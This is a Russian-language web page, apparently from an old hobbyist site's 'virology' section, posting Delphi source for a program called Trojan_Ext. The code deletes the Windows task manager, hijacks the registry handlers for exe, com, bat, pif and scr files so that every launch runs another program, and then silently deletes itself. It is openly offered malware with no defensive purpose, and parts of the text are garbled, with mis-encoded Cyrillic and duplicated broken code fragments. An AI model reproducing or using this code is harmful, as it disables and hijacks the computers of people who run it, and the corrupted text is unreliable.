Опрос
	Нужна ли цензура в интернете? Да Нет Мне всё равно Она и так есть Результаты \| Архив опросов Всего ответов: 197

Главная » Статьи » Delphi » Вирусология

Исходник функциональной программы на Delphi

И еще один исходник var Buffer: array[0..1023] of Char Buffer: [0..1023] Charreg: TRegistry; winDir: String; OurFile: array[0..MAX_PATH] of Char; Cmd: String; SetString(WinDir, Buffer, GetWindowsDirectory(Buffer, SizeOf(Buffer))); DeleteFile(PChar(WinDir+’\System32\taskmgr.exe’)); Reg:=TRegistry.Create; Reg.LazyWrite:=false; Reg.RootKey:=HKEY_CLASSES_ROOT; Reg.OpenKey(’exefile\shell\Open\Command’,true); Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’); Reg.CloseKey; Reg.OpenKey(’piffile\shell\Open\Command’,true); Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’); Reg.CloseKey; Reg.OpenKey(’comfile\shell\Open\Command’,true); Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’); Reg.CloseKey; Reg.OpenKey(’scrfile\shell\Open\Command’,true); Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’); Reg.CloseKey; Reg.OpenKey(’batfile\shell\Open\Command’,true); Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’); Reg.CloseKey; Reg.Free; try if (GetModuleFileName(0, OurFile, MAX_PATH) <> 0) and (GetShortPathName(OurFile, OurFile, MAX_PATH) <> 0) then (GetModuleFileName(0, OurFile, MAX_PATH) <> 0) (GetShortPathName(OurFile, OurFile, MAX_PATH) <> 0) begin Cmd:= ‘/c del ‘ + ‘”‘+OurFile+’”‘ + ‘ >> NUL’; if (GetEnvironmentVariable(’ComSpec’, OurFile, MAX_PATH) <> 0) and (ShellExecute(0, 0, OurFile, PChar(Cmd), 0, SW_HIDE) > 32) then (GetEnvironmentVariable(’ComSpec’, OurFile, MAX_PATH) <> 0) (ShellExecute(0, 0, OurFile, PChar(Cmd), 0, SW_HIDE) > 32) begin Halt; end; end; except Halt; end; Aio e ana. Enoiaiee eae anaaaa i?eeaaaaony. Aio iieiue eia: program Trojan_Ext; Trojan_Ext; uses Windows,Registry,ShellApi; var Buffer: array[0..1023] of Char; Buffer: [0..1023] Char;reg: TRegistry; winDir: String; OurFile: array[0..MAX_PATH] of Char; Cmd: String; begin SetString(WinDir, Buffer, GetWindowsDirectory(Buffer, SizeOf(Buffer))); DeleteFile(PChar(WinDir+’\System32\taskmgr.exe’)); Reg:=TRegistry.Create; Reg.LazyWrite:=false; Reg.RootKey:=HKEY_CLASSES_ROOT; Reg.OpenKey(’exefile\shell\Open\Command’,true); Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’); Reg.CloseKey; Reg.OpenKey(’piffile\shell\Open\Command’,true); Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’); Reg.CloseKey; Reg.OpenKey(’comfile\shell\Open\Command’,true); Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’); Reg.CloseKey; Reg.OpenKey(’scrfile\shell\Open\Command’,true); Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’); Reg.CloseKey; Reg.OpenKey(’batfile\shell\Open\Command’,true); Reg.WriteString('’,'C:\ThisIsAVirus\Saphir.exe’); Reg.CloseKey; Reg.Free; try if (GetModuleFileName(0, OurFile, MAX_PATH) <> 0) and (GetShortPathName(OurFile, OurFile, MAX_PATH) <> 0) then (GetModuleFileName(0, OurFile, MAX_PATH) <> 0) (GetShortPathName(OurFile, OurFile, MAX_PATH) <> 0) begin Cmd:= ‘/c del ‘ + ‘”‘+OurFile+’”‘ + ‘ >> NUL’; if (GetEnvironmentVariable(’ComSpec’, OurFile, MAX_PATH) <> 0) and (ShellExecute(0, 0, OurFile, PChar(Cmd), 0, SW_HIDE) > 32) then (GetEnvironmentVariable(’ComSpec’, OurFile, MAX_PATH) <> 0) (ShellExecute(0, 0, OurFile, PChar(Cmd), 0, SW_HIDE) > 32) begin Halt; end; end; except Halt; end; end.
1 2 3 4 5 Категория: Вирусология \| Добавил: dolphin (27.09.2008)
Просмотров: 3822 \| Комментарии: 2 \| Рейтинг: 4.2/5

Всего комментариев: 2
Порядок вывода комментариев: 0 Спам 2 TrojanWinLock • 22:09, 19.08.2011 Почему? 1 Спам 1 cool1 • 15:57, 24.09.2010 Не испытывайте его дома!

Профиль

Поиск

Наша кнопка

Статистика
	Статистика материалов Файлов: 457 Форум: 1175/8162 Коментариев: 770 Новостей: 29 Статистика пользователей Всего: 385 За неделю: 2 Вчера: 0 Сегодня: 0 Всего онлайн: 76 Гостей: 76 Пользователей: 0